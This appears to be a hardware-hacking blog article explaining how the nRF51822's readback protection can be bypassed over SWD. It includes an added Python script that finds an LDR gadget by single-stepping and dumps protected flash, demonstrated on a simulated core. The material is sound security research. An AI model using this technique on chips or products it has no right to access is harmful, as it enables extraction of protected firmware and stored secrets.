Instruction Set Hack For Protected Memory Access

The nRF51 series is a family of low-power Bluetooth SoCs from Nordic Semiconductor built around ARM Cortex cores. The nRF51822 has a Cortex-M0 core and is used in a lot of products. [Loren] has written a blog post in which he claims to be able to circumvent the readback protection on the chip, giving access to the ROM, RAM and registers as well as allowing interactive debugging sessions.

The hack stems from the fact that the Serial Wire Debug (SWD) interface cannot be completely disabled on these chips: even with the Memory Protection Unit blocking the debugger's direct access to the protected memory regions, the debugger can still halt the core, read and write its registers (R0 through R15 included) and single-step it. The second key piece is that the CPU itself can still fetch and execute code from the protected flash, and a load performed by the CPU is not subject to the debugger-side restriction. Combine the two and the debugger can make the CPU do its reading for it.

The Thumb instruction set contains a number of register-indirect load instructions, and [Loren] points to LDR R2,[R0], which loads the word at the address held in R0 into R2. We cannot write our own code into the protected flash, so the idea is to find such an instruction in the code that is already there. How? Set R0 and R2 to zero, point the Program Counter at each halfword in the code space in turn and single-step it. When an instruction leaves R2 equal to the word stored at 0x00000000 (the address R0 points at), we have found it. Conveniently we already know that word: address 0x00000000 is the first entry of the vector table, the initial stack pointer, which the core loads into SP at reset and which SWD can read back.

Once you have the address of that instruction, it is just a matter of setting R0 to the address you want to read, setting the PC to the LDR instruction, single-stepping it and reading the copied word out of R2. Loop over the address range and you can dump the entire ROM. [Loren] has packaged the whole thing in a Python script (GitHub) which you can try out with an ST-Link at home.
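To make the two steps concrete, here is the gadget hunt and the dump loop written out in Python. This is an added example, not [Loren]'s script: the `DebugPort` interface (`read_reg`, `write_reg`, `step`) is an assumed abstraction over whatever an ST-Link or pyOCD exposes, and `SimulatedCortexM0` is a constructed stand-in for a halted, readback-protected core that decodes only the two Thumb encodings the demo needs, so the whole thing runs offline against a constructed 256-byte flash image. It also adds two checks a practitioner would want: the other low registers are parked at a decoy address so that only a load through R0 matches, and a second probe with R0 pointing at the reset vector confirms the hit really depends on R0 rather than being, say, a literal-pool load that happens to produce the right value.

```python
"""Added example of the nRF51 SWD readback trick: find an LDR R2,[R0]
gadget by single-stepping through code space, then replay it to dump
memory. Not [Loren]'s script; DebugPort and the simulated core are
assumptions made so that the logic runs offline."""
import struct

DECOY_ADDR = 0x40   # parked in R1..R7 so a load through any register but R0 misses


class DebugPort:
    """Assumed minimal debugger interface: a real one would wrap an ST-Link or pyOCD."""

    def read_reg(self, name: str) -> int:
        raise NotImplementedError

    def write_reg(self, name: str, value: int) -> None:
        raise NotImplementedError

    def step(self) -> None:
        raise NotImplementedError


class SimulatedCortexM0(DebugPort):
    """Constructed stand-in for a halted, readback-protected chip: the host may
    touch core registers and single-step but never reads flash directly. Only
    LDR Rt,[Rn,#imm5*4] and MOVS Rd,#imm8 are decoded; any other halfword is
    treated as a no-op that advances PC (a simplification of real hardware)."""

    def __init__(self, flash: bytes):
        self.flash = flash
        self.regs = {f"r{i}": 0 for i in range(13)}
        self.regs["sp"] = struct.unpack_from("<I", flash, 0)[0]  # vector 0 = initial SP
        self.regs["pc"] = 0

    def read_reg(self, name):
        return self.regs[name]

    def write_reg(self, name, value):
        self.regs[name] = value & 0xFFFFFFFF

    def step(self):
        pc = self.regs["pc"]
        insn = struct.unpack_from("<H", self.flash, pc)[0]
        if insn & 0xF800 == 0x6800:                       # LDR Rt,[Rn,#imm5*4]
            imm5, rn, rt = (insn >> 6) & 0x1F, (insn >> 3) & 7, insn & 7
            addr = self.regs[f"r{rn}"] + imm5 * 4
            self.regs[f"r{rt}"] = struct.unpack_from("<I", self.flash, addr)[0]
        elif insn & 0xF800 == 0x2000:                     # MOVS Rd,#imm8
            self.regs[f"r{(insn >> 8) & 7}"] = insn & 0xFF
        self.regs["pc"] = pc + 2


def find_load_gadget(dp, code_size, expected):
    """Sweep PC over code space for an instruction that copies [R0] into R2.
    `expected` is the word at address 0, already known from the initial SP."""
    for pc in range(0, code_size, 2):
        dp.write_reg("r0", 0)
        dp.write_reg("r2", 0)
        for i in (1, 3, 4, 5, 6, 7):
            dp.write_reg(f"r{i}", DECOY_ADDR)
        dp.write_reg("pc", pc)
        dp.step()
        if dp.read_reg("r2") != expected:
            continue
        # Second probe: address 4 holds the reset vector, never the initial SP,
        # so a genuine load through R0 must now produce something different.
        dp.write_reg("r0", 4)
        dp.write_reg("r2", 0)
        dp.write_reg("pc", pc)
        dp.step()
        if dp.read_reg("r2") != expected:
            return pc
    return None


def dump_words(dp, gadget_pc, start, size):
    """Replay the gadget with R0 walking through [start, start + size)."""
    out = bytearray()
    for addr in range(start, start + size, 4):
        dp.write_reg("r0", addr)
        dp.write_reg("pc", gadget_pc)
        dp.step()
        out += struct.pack("<I", dp.read_reg("r2"))
    return bytes(out)


def build_test_image():
    """Constructed 256-byte flash image: vector table, some data and a few
    instructions, one of which is the wanted LDR R2,[R0] (0x6802)."""
    img = bytearray(b"\xff" * 256)
    struct.pack_into("<II", img, 0, 0x20004000, 0x000000C1)  # initial SP, reset
    img[0x40:0x50] = b"nRF51 secret key"
    code = struct.pack("<4H",
                       0x681A,   # LDR R2,[R3]  decoy: matches only if R3 == 0
                       0x2205,   # MOVS R2,#5
                       0x6802,   # LDR R2,[R0]  the gadget we want
                       0x4770)   # BX LR
    img[0xC0:0xC0 + len(code)] = code
    return bytes(img)


if __name__ == "__main__":
    image = build_test_image()
    dp = SimulatedCortexM0(image)
    word0 = dp.read_reg("sp")               # learned from the halted core, not flash
    gadget = find_load_gadget(dp, len(image), word0)
    print(f"LDR R2,[R0] found at 0x{gadget:04x}")
    print("dump matches image:", dump_words(dp, gadget, 0, len(image)) == image)
```

On real silicon the sweep is executing arbitrary halfwords one at a time, so the script driving the debugger has to cope with branches, 32-bit instructions, faults and peripheral side effects along the way; the simulator above sidesteps all of that by treating unknown encodings as no-ops.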

The nRF51 is used in a lot of places including the BBC microbit as well as other devices that can be sniffed using cheap SDRs for a start. The game is afoot.

